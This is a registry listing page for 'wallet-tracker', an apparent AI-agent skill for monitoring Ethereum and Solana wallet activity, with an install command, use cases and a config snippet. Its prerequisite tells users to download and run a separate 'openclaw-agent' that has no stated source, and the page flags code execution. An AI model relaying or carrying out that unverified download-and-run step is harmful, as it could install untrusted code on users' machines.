ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Track blockchain addresses, monitor whale movements, and analyze portfolio changes on Ethereum and Solana with the OpenClaw wallet-tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-pbckx
Or

What This Skill Does

The wallet-tracker skill provides a robust framework for real-time monitoring of blockchain activities. It enables users to observe transactions, track whale movements, and analyze portfolio fluctuations across major networks like Ethereum and Solana. By integrating with the openclaw-agent, this skill acts as a bridge between blockchain explorers and your local terminal, allowing for automated, script-driven surveillance of any public wallet address.

Installation

To begin using the wallet-tracker, ensure you have the OpenClaw environment initialized. Execute the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-pbckx

Prerequisites: You must download and run the openclaw-agent to handle the underlying network requests. Without this agent, the wallet monitoring functions will not trigger.

Use Cases

  • Whale Alerting: Monitor high-value transactions to track institutional or whale movements in real-time.
  • Portfolio Management: Automatically log token transfers and NFT movements to maintain an updated snapshot of your assets.
  • DeFi Analysis: Keep track of interaction patterns with decentralized finance protocols.
  • Transaction Auditing: Quickly list the last N transactions for any wallet to verify activity logs.

Example Prompts

  1. "Track the Ethereum wallet 0x71C... and notify me whenever a transaction exceeds 10 ETH."
  2. "Show me the last 10 SOL transactions for address [SOL_ADDRESS] and print their slot heights."
  3. "Monitor my wallet [ADDRESS] for any incoming ERC-20 token transfers and report the symbol and amount."

Tips & Limitations

  • API Limits: When using external services like Etherscan, ensure your API keys are valid to avoid rate limiting or connection errors.
  • Agent Dependency: Always keep the openclaw-agent process active in the background; closing it will terminate the tracking loop.
  • Privacy: Only track public blockchain addresses. While on-chain data is transparent, ensure you are not monitoring sensitive internal data through unauthorized API endpoints.
  • Scaling: For large-scale monitoring of thousands of addresses, consider implementing a local caching layer to reduce redundant network calls and optimize your polling interval.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-pbckx": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#tracking#web3
Safety Score: 3/5

Flags: network-access, external-api, code-execution